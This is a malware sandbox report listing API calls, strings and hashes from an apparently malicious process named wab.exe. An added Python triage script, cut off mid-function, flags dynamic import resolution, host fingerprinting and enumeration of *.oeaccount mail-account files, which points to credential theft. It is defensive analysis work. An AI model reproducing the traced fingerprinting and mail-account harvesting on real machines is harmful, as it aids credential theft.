                                                                                                                                                                                                          • Instruction Fuzzy Hash: 89F01D75A0010CBFEB019F959CC1CAF7BBDFB497A4B204475F504E2150D274AE41AA64
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • memset.MSVCRT ref: 00417B7B
                                                                                                                                                                                                          • UnlockFileEx.KERNEL32(?,00000000,?,00000000,?), ref: 00417B9B
                                                                                                                                                                                                          • LockFileEx.KERNEL32(?,00000001,00000000,?,00000000,?), ref: 00417BA7
                                                                                                                                                                                                          • GetLastError.KERNEL32 ref: 00417BB5
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.12128866195.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: File$ErrorLastLockUnlockmemset
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 3727323765-0
                                                                                                                                                                                                          • Opcode ID: 8dd354450774e38097dcb59a2dc1954613c626237ffe04feccb939eb681cbc84
                                                                                                                                                                                                          • Instruction ID: 0282759007fe27108f915f617c318df1b7667033481b7feabffed058191037b6
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8dd354450774e38097dcb59a2dc1954613c626237ffe04feccb939eb681cbc84
                                                                                                                                                                                                          • Instruction Fuzzy Hash: A801F971108208BFDB219FA5DC84D9B77B8FB40308F20483AF51395050D730A944CB65
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00418178,000000FF,00000000,00000000,00417D63,?,?,00417D63,00418178,00000000,?,004183E5,?,00000000), ref: 004173FF
                                                                                                                                                                                                          • malloc.MSVCRT ref: 00417407
                                                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00418178,000000FF,00000000,00000000,?,00417D63,00418178,00000000,?,004183E5,?,00000000,00000000,?), ref: 0041741E
                                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT ref: 00417425
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.12128866195.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: ByteCharMultiWide$??3@malloc
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 4284152360-0
                                                                                                                                                                                                          • Opcode ID: 216751ef8fd097c825dd04e316b9a1fd88e5245b1c8a55e2c2eb04db0303a8de
                                                                                                                                                                                                          • Instruction ID: cad4d062c051d68cf548c6c9b5623cfc012c7edadb1d539185634ca375d1558c
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 216751ef8fd097c825dd04e316b9a1fd88e5245b1c8a55e2c2eb04db0303a8de
                                                                                                                                                                                                          • Instruction Fuzzy Hash: E7F0377620921E7BDA1029655C40D77779CEB8B675B11072BBA10D21C1ED59D81005B5
Uniqueness
Uniqueness Score: -1.00%

APIs
• memset.MSVCRT ref: 0040F673
• WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,00007FFF,00000000,00000000,?,<item>), ref: 0040F690
• strlen.MSVCRT ref: 0040F6A2
• WriteFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 0040F6B3
Memory Dump Source
• Source File: 00000004.00000002.12128866195.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_wab.jbxd
Similarity
• API ID: ByteCharFileMultiWideWritememsetstrlen
• String ID:
• API String ID: 2754987064-0
Uniqueness
Uniqueness Score: -1.00%

APIs
• memset.MSVCRT ref: 0040F6E2
• WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,00001FFF,00000000,00000000,?,<item>), ref: 0040F6FB
• strlen.MSVCRT ref: 0040F70D
• WriteFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 0040F71E
Memory Dump Source
• Source File: 00000004.00000002.12128866195.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_wab.jbxd
Similarity
• API ID: ByteCharFileMultiWideWritememsetstrlen
• String ID:
• API String ID: 2754987064-0
Uniqueness
Uniqueness Score: -1.00%

APIs
• memset.MSVCRT ref: 00402FD7
• WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,00001FFF,00000000,00000000), ref: 00402FF4
• strlen.MSVCRT ref: 00403006
• WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00403017
Memory Dump Source
• Source File: 00000004.00000002.12128866195.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_wab.jbxd
Similarity
• API ID: ByteCharFileMultiWideWritememsetstrlen
• String ID:
• API String ID: 2754987064-0
Uniqueness
Uniqueness Score: -1.00%

APIs
  • Part of subcall function 00409D7F: memset.MSVCRT ref: 00409D9E
  • Part of subcall function 00409D7F: GetClassNameW.USER32(?,00000000,000000FF), ref: 00409DB5
  • Part of subcall function 00409D7F: _wcsicmp.MSVCRT ref: 00409DC7
• SetBkMode.GDI32(?,00000001), ref: 004143A2
• SetBkColor.GDI32(?,00FFFFFF), ref: 004143B0
• SetTextColor.GDI32(?,00C00000), ref: 004143BE
• GetStockObject.GDI32(00000000), ref: 004143C6
Memory Dump Source
• Source File: 00000004.00000002.12128866195.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_wab.jbxd
Similarity
• API ID: Color$ClassModeNameObjectStockText_wcsicmpmemset
• String ID:
• API String ID: 764393265-0
Uniqueness
Uniqueness Score: -1.00%

APIs
• FileTimeToSystemTime.KERNEL32(?,?), ref: 0040A76D
• SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?,?,?), ref: 0040A77D
• SystemTimeToFileTime.KERNEL32(?,?,?,?), ref: 0040A78C
Memory Dump Source
• Source File: 00000004.00000002.12128866195.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_wab.jbxd
Similarity
• API ID: Time$System$File$LocalSpecific
• String ID:
• API String ID: 979780441-0
Uniqueness
Uniqueness Score: -1.00%

APIs
• memcpy.MSVCRT ref: 004134E0
• memcpy.MSVCRT ref: 004134F2
• GetModuleHandleW.KERNEL32(00000000), ref: 00413505
• DialogBoxParamW.USER32(00000000,0000006B,?,Function_000131DC,00000000), ref: 00413519
Memory Dump Source
• Source File: 00000004.00000002.12128866195.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_wab.jbxd
Similarity
• API ID: memcpy$DialogHandleModuleParam
• String ID:
• API String ID: 1386444988-0
Uniqueness
Uniqueness Score: -1.00%

APIs
• SendMessageW.USER32(?,00000010,00000000,00000000), ref: 00411D71
• InvalidateRect.USER32(?,00000000,00000000), ref: 00411DC1
Strings
Memory Dump Source
• Source File: 00000004.00000002.12128866195.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_wab.jbxd
Similarity
• API ID: InvalidateMessageRectSend
• String ID: d=E
• API String ID: 909852535-3703654223
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • wcschr.MSVCRT ref: 0040F79E
                                                                                                                                                                                                          • wcschr.MSVCRT ref: 0040F7AC
                                                                                                                                                                                                            • Part of subcall function 0040AA8C: wcslen.MSVCRT ref: 0040AAA8
                                                                                                                                                                                                            • Part of subcall function 0040AA8C: memcpy.MSVCRT ref: 0040AACB
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.12128866195.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: wcschr$memcpywcslen
                                                                                                                                                                                                          • String ID: "
                                                                                                                                                                                                          • API String ID: 1983396471-123907689
                                                                                                                                                                                                          • Opcode ID: a49a7bca3fdcf7d664bb1a19bbfdf9ac20233bdad490a911e177b035a317b33a
                                                                                                                                                                                                          • Instruction ID: b5ec2b97dc3a1d34b4ae52474db4a85f3d32b900c8044ec90cdce640e07fed14
                                                                                                                                                                                                          • Opcode Fuzzy Hash: a49a7bca3fdcf7d664bb1a19bbfdf9ac20233bdad490a911e177b035a317b33a
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7C315532904204ABDF24EFA6C8419EEB7B4EF44324F20457BEC10B75D1DB789A46CE99
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                            • Part of subcall function 0040A32D: SetFilePointer.KERNEL32(0040C2BF,?,00000000,00000000,?,0040C0C5,00000000,00000000,?,00000020,?,0040C255,?,?,*.*,0040C2BF), ref: 0040A33A
                                                                                                                                                                                                          • _memicmp.MSVCRT ref: 0040C00D
                                                                                                                                                                                                          • memcpy.MSVCRT ref: 0040C024
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.12128866195.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: FilePointer_memicmpmemcpy
                                                                                                                                                                                                          • String ID: URL
                                                                                                                                                                                                          • API String ID: 2108176848-3574463123
                                                                                                                                                                                                          • Opcode ID: 0ffae9aaa7e8776105f4b8355cfdff3a17deb021c318058ed5e09a60dc4caa80
                                                                                                                                                                                                          • Instruction ID: e2f67ed442a0be3002cd5c838a3b557e7d557c6bd05ddcbc6cfa09d4dad31ce1
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0ffae9aaa7e8776105f4b8355cfdff3a17deb021c318058ed5e09a60dc4caa80
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 03110271600204FBEB11DFA9CC45F5B7BA9EF41388F004166F904AB291EB79DE10C7A9
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.12128866195.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: _snwprintfmemcpy
                                                                                                                                                                                                          • String ID: %2.2X
                                                                                                                                                                                                          • API String ID: 2789212964-323797159
                                                                                                                                                                                                          • Opcode ID: 565383a1db30c24bbe212324ccaa161bb2139c15501903e42e5a35b00c7b7038
                                                                                                                                                                                                          • Instruction ID: 802357eb4f50a043e47c8b78e7782d62930b20b04af67ea92e1f933aeb07fc5a
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 565383a1db30c24bbe212324ccaa161bb2139c15501903e42e5a35b00c7b7038
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 71118E32900309BFEB10DFE8D8829AFB3B9FB05314F108476ED11E7141D6789A258B96
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.12128866195.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: _snwprintf
                                                                                                                                                                                                          • String ID: %%-%d.%ds
                                                                                                                                                                                                          • API String ID: 3988819677-2008345750
                                                                                                                                                                                                          • Opcode ID: ff7c17540168d96ed4966b56b0a467b3337874ab214ea8a90bdbbe2252cfc3dc
                                                                                                                                                                                                          • Instruction ID: 7541af853baca77dfc804340e5f0ab0fe899c5989b891af63cf45e557cb41de3
                                                                                                                                                                                                          • Opcode Fuzzy Hash: ff7c17540168d96ed4966b56b0a467b3337874ab214ea8a90bdbbe2252cfc3dc
                                                                                                                                                                                                          • Instruction Fuzzy Hash: B801DE71200204BFD720EE59CC82D5AB7E8FB48308B00443AF846A7692D636E854CB65
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • memset.MSVCRT ref: 0040E770
                                                                                                                                                                                                          • SendMessageW.USER32(F^@,0000105F,00000000,?), ref: 0040E79F
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.12128866195.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: MessageSendmemset
                                                                                                                                                                                                          • String ID: F^@
                                                                                                                                                                                                          • API String ID: 568519121-3652327722
                                                                                                                                                                                                          • Opcode ID: f8314852293f46423bc2a010faad31e0b7cb282108ef47112cad279f3d3f551f
                                                                                                                                                                                                          • Instruction ID: 5049a961280a3e8282645b70ff0f7bf8ff78c54eb6baa8beabb6daf17925e322
                                                                                                                                                                                                          • Opcode Fuzzy Hash: f8314852293f46423bc2a010faad31e0b7cb282108ef47112cad279f3d3f551f
                                                                                                                                                                                                          • Instruction Fuzzy Hash: A701A239900204ABEB209F5ACC81EABB7F8FF44B45F008429E854A7291D3349855CF79
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.12128866195.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: PlacementWindowmemset
                                                                                                                                                                                                          • String ID: WinPos
                                                                                                                                                                                                          • API String ID: 4036792311-2823255486
                                                                                                                                                                                                          • Opcode ID: 43a26fe09d4836415a0f9153b5f51c370111d8f5fda2234af2192006d5bb601b
                                                                                                                                                                                                          • Instruction ID: 942d740d8c3c01bede0812328a3a4706cce13fdf2e849e9dfea5930b7654417c
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 43a26fe09d4836415a0f9153b5f51c370111d8f5fda2234af2192006d5bb601b
                                                                                                                                                                                                          • Instruction Fuzzy Hash: D4F096B0600204EFEB04DF55D899F6A33E8EF04701F1440B9F909DB1D1E7B89A04C729
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                            • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,0040DDBE,?,?,00000000,00000208,000000FF,00000000,00000104), ref: 00409BD5
                                                                                                                                                                                                          • wcsrchr.MSVCRT ref: 0040DCE9
                                                                                                                                                                                                          • wcscat.MSVCRT ref: 0040DCFF
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.12128866195.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: FileModuleNamewcscatwcsrchr
                                                                                                                                                                                                          • String ID: _lng.ini
                                                                                                                                                                                                          • API String ID: 383090722-1948609170
                                                                                                                                                                                                          • Opcode ID: d415c57d84eb2c5e7c8364d47a353e5cf76fbd17fa45f1fd58641194e3ec22f3
                                                                                                                                                                                                          • Instruction ID: 003e7a9acac466aac22365d7a2b75ab102816a5e64793edac74c8fca87dba5cc
                                                                                                                                                                                                          • Opcode Fuzzy Hash: d415c57d84eb2c5e7c8364d47a353e5cf76fbd17fa45f1fd58641194e3ec22f3
                                                                                                                                                                                                          • Instruction Fuzzy Hash: CEC0129654561430F51526116C03B4E12585F13316F21006BFD01340C3EFAD5705406F
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

APIs
  • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
  • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
  • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
  • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
  • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
  • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
• GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathW), ref: 00414BA4
Strings
Memory Dump Source
• Source File: 00000004.00000002.12128866195.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_wab.jbxd
Similarity
• API ID: LibraryLoad$AddressDirectoryProcSystemmemsetwcscatwcscpy
• String ID: SHGetSpecialFolderPathW$shell32.dll
• API String ID: 2773794195-880857682
• Opcode ID: c93510e3b53e51a0fa34588ad362a10002a2b390dcacad00d2ab9882db4cd41e
• Instruction ID: 520684b8054713cb13715c6c8af1848dbb459e29e8538d47b3508bbaa4bbc045
• Opcode Fuzzy Hash: c93510e3b53e51a0fa34588ad362a10002a2b390dcacad00d2ab9882db4cd41e
• Instruction Fuzzy Hash: 23D0C7719483019DD7105F65AC19B8336545B50307F204077AC04E66D7EA7CC4C49E1D
Uniqueness
Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000004.00000002.12128866195.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_wab.jbxd
Similarity
• API ID: memcpy$memset
• String ID:
• API String ID: 438689982-0
• Opcode ID: ef116662622e1dd2984e515fcaedae38b96dc359db8ee055bda91140f73fb117
• Instruction ID: 797e1fd24865db6de4a95defd5ca955254a0dec7c2ff798398e4890fb9874305
• Opcode Fuzzy Hash: ef116662622e1dd2984e515fcaedae38b96dc359db8ee055bda91140f73fb117
• Instruction Fuzzy Hash: 1B51A2B5A00219EBDF14DF55D882BAEBBB5FF04340F54806AE904AA245E7389E50DBD8
Uniqueness
Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000004.00000002.12128866195.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_wab.jbxd
Similarity
• API ID: ??2@$memset
• String ID:
• API String ID: 1860491036-0
• Opcode ID: 96af4030734a5e2f6ef23c2ae6277f6dabdb1784b135b246f31e93988d402875
• Instruction ID: 7dda0de82ffecb18951b1be6aadeef514c87807746e1e94fbb8d74dd8fa57bec
• Opcode Fuzzy Hash: 96af4030734a5e2f6ef23c2ae6277f6dabdb1784b135b246f31e93988d402875
• Instruction Fuzzy Hash: 4F21F3B1A003008FDB219F2B9445912FBE8FF90310B2AC8AF9158CB2B2D7B8C454CF15
Uniqueness
Uniqueness Score: -1.00%

APIs
• memcmp.MSVCRT ref: 00408AF3
  • Part of subcall function 00408A6E: memcmp.MSVCRT ref: 00408A8C
  • Part of subcall function 00408A6E: memcpy.MSVCRT ref: 00408ABB
  • Part of subcall function 00408A6E: memcpy.MSVCRT ref: 00408AD0
• memcmp.MSVCRT ref: 00408B2B
• memcmp.MSVCRT ref: 00408B5C
• memcpy.MSVCRT ref: 00408B79
Memory Dump Source
• Source File: 00000004.00000002.12128866195.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_wab.jbxd
Similarity
• API ID: memcmp$memcpy
• String ID:
• API String ID: 231171946-0
• Opcode ID: cadc00b77c621a7338fc70958db42bdaca3a8748761d36a10e112d3b7644ebb1
• Instruction ID: 684d12db3f6cc64b33ac9287d8c213aaad77bc3869a84850190dd4d7d2050874
• Opcode Fuzzy Hash: cadc00b77c621a7338fc70958db42bdaca3a8748761d36a10e112d3b7644ebb1
• Instruction Fuzzy Hash: 8411A9F1600308AAFF202A129D07F5A3658DB21768F25443FFC84641D2FE7DAA50C55E
Uniqueness
Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000004.00000002.12128866195.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_wab.jbxd
Similarity
• API ID: wcslen$wcscat$wcscpy
• String ID:
• API String ID: 1961120804-0
• Opcode ID: a9fb2844ceaa9879afdc746da54e0e12922ba62d069c0ab92073ae84f79bc1ad
• Instruction ID: 298d28553a3f700387dea6c06157f027a7ba74c69b0fe1c0d14b010c740a3b55
• Opcode Fuzzy Hash: a9fb2844ceaa9879afdc746da54e0e12922ba62d069c0ab92073ae84f79bc1ad
• Instruction Fuzzy Hash: 3AE0E532000114BADF116FB2D8068CE3B99EF42364751883BFD08D2043EB3ED511869E
Uniqueness
Uniqueness Score: -1.00%

Control-flow Graph
• Function 408043-40818c (rendered graph; entry block calls memset * 4, GetComputerNameA, GetUserNameA, MultiByteToWideChar * 2, strlen * 2, memcpy, followed by a loop over blocks 40818e-4081f4 and exit at 4081f6-4081fa)
APIs
• memset.MSVCRT ref: 004080A5
• memset.MSVCRT ref: 004080B9
• memset.MSVCRT ref: 004080D3
• memset.MSVCRT ref: 004080E8
• GetComputerNameA.KERNEL32(?,?), ref: 0040810A
• GetUserNameA.ADVAPI32(?,?), ref: 0040811E
• MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 0040813D
• MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 00408152
• strlen.MSVCRT ref: 0040815B
• strlen.MSVCRT ref: 0040816A
• memcpy.MSVCRT ref: 0040817C
Strings
Memory Dump Source
• Source File: 00000005.00000002.12092649182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_wab.jbxd
Similarity
• API ID: memset$ByteCharMultiNameWidestrlen$ComputerUsermemcpy
• String ID: 5$H$O$b$i$}$}
• API String ID: 1832431107-3760989150
• Opcode ID: 79ae67408c577b497298e938f7cc844113f9d56d662cffe44a33c18994f8cf05
• Instruction ID: 839b780f30062d9b3c48c7c4bb1edbc251b0819f5d773de0f2740150403ea89f
• Opcode Fuzzy Hash: 79ae67408c577b497298e938f7cc844113f9d56d662cffe44a33c18994f8cf05
• Instruction Fuzzy Hash: D151D771C0025DAEDB11CBA8CC41BEEBBBCEF49314F0441EAE555AA182D3389B45CB65
Uniqueness
Uniqueness Score: -1.00%

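Three of the function records in this report describe behaviour a triager wants pulled out of the raw API lists rather than read by eye: the SHGetSpecialFolderPathW record (process 4) resolves an import at run time by building a path with GetSystemDirectoryW/wcscpy/wcscat, passing it to LoadLibraryW and then calling GetProcAddress with the export name; the record above collects GetComputerNameA and GetUserNameA into a wide-char buffer (host fingerprinting for the beacon); and the record that follows enumerates files matching *.oeaccount with FindFirstFileA/FindNextFileA, which are the account configuration files of Windows Mail / Windows Live Mail. The script below is an added example, not part of the Joe Sandbox report or its tooling: it parses API call lines in this report's own format and flags those three patterns. The heuristic names and the rule that a GetSystemDirectory-built path is not a search-order-hijack candidate are this example's own choices. SAMPLE_REPORT is constructed from the records shown on this page, trimmed to the lines the parser reads; hash lines are omitted because the *.oeaccount record's hashes are not on the page.

```python
from __future__ import annotations
import re
from dataclasses import dataclass, field

# Constructed input: three records copied from the report above, trimmed to the
# lines this parser reads (hash lines omitted; the third record's are not on the page).
SAMPLE_REPORT = """\
APIs
  • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
  • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
• GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathW), ref: 00414BA4
• Source File: 00000004.00000002.12128866195.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• String ID: SHGetSpecialFolderPathW$shell32.dll
APIs
• GetComputerNameA.KERNEL32(?,?), ref: 0040810A
• GetUserNameA.ADVAPI32(?,?), ref: 0040811E
• Source File: 00000005.00000002.12092649182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
APIs
• FindFirstFileA.KERNELBASE(?,?,?,?,0044375D,*.oeaccount,.8D,?,00000104), ref: 00407C9D
• FindNextFileA.KERNELBASE(?,?,?,?,0044375D,*.oeaccount,.8D,?,00000104), ref: 00407CBB
• Source File: 00000005.00000002.12092649182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
"""

# One call line: "• [Part of subcall function ADDR: ]Api.MODULE[(args)][,] ref: ADDR"
API_RE = re.compile(
    r"^[•*-]?\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]{8}): )?"
    r"(?P<api>[\w?@]+)\.(?P<mod>\w+)(?:\((?P<args>[^)]*)\))?,?\s*ref: (?P<ref>[0-9A-Fa-f]{8})$"
)
LOADERS = {"LoadLibraryA", "LoadLibraryW", "LoadLibraryExA", "LoadLibraryExW"}


@dataclass
class ApiCall:
    api: str
    module: str
    args: list[str]
    ref: str             # address of the call site
    subcall: str | None  # callee address when the call sits inside a subroutine


@dataclass
class FunctionRecord:
    process: str = "?"   # first field of the memory-dump name (sandbox process index)
    calls: list[ApiCall] = field(default_factory=list)
    strings: list[str] = field(default_factory=list)

    def has(self, api: str) -> bool:
        return any(c.api == api for c in self.calls)


def parse_records(text: str) -> list[FunctionRecord]:
    """Split the report into per-function records; each one starts at an 'APIs' header."""
    records: list[FunctionRecord] = []
    cur: FunctionRecord | None = None
    for raw in text.splitlines():
        line = raw.strip()
        if line == "APIs":
            cur = FunctionRecord()
            records.append(cur)
            continue
        if cur is None:
            continue
        m = API_RE.match(line)
        if m:
            args = [a.strip() for a in m["args"].split(",")] if m["args"] else []
            cur.calls.append(ApiCall(m["api"], m["mod"], args, m["ref"], m["sub"]))
        elif line.startswith("• Source File:"):
            cur.process = line.split("Source File:", 1)[1].strip().split(".", 1)[0]
        elif line.startswith("• String ID:"):
            cur.strings = [s for s in line.split(":", 1)[1].strip().split("$") if s]
    return records


def triage(rec: FunctionRecord) -> list[str]:
    """Heuristics over one record (this example's own, not Joe Sandbox signatures)."""
    out: list[str] = []
    gpa = next((c for c in rec.calls if c.api == "GetProcAddress"), None)
    if gpa and any(c.api in LOADERS for c in rec.calls):
        # Arg 2 of GetProcAddress is the export name when the sandbox recovered it, '?' otherwise.
        name = gpa.args[1] if len(gpa.args) > 1 else "?"
        dll = next((s for s in rec.strings if s.lower().endswith(".dll")), "?")
        out.append(f"dynamic import: {name} from {dll}")
        if rec.has("GetSystemDirectoryW"):
            # Absolute path under the system directory: not a DLL search-order hijack candidate.
            out.append("DLL path built from GetSystemDirectoryW (absolute, not search-order dependent)")
    if rec.has("GetComputerNameA") and rec.has("GetUserNameA"):
        out.append("host fingerprint: computer name + user name")
    for c in rec.calls:
        if c.api.startswith("FindFirstFile"):
            out.extend(f"file enumeration: {a}" for a in c.args if "*" in a)
    return out


def triage_report(text: str) -> dict[str, list[str]]:
    """Map 'proc <index> @ <first direct call site>' to findings, skipping quiet records."""
    result: dict[str, list[str]] = {}
    for rec in parse_records(text):
        site = next((c.ref for c in rec.calls if c.subcall is None), "?")
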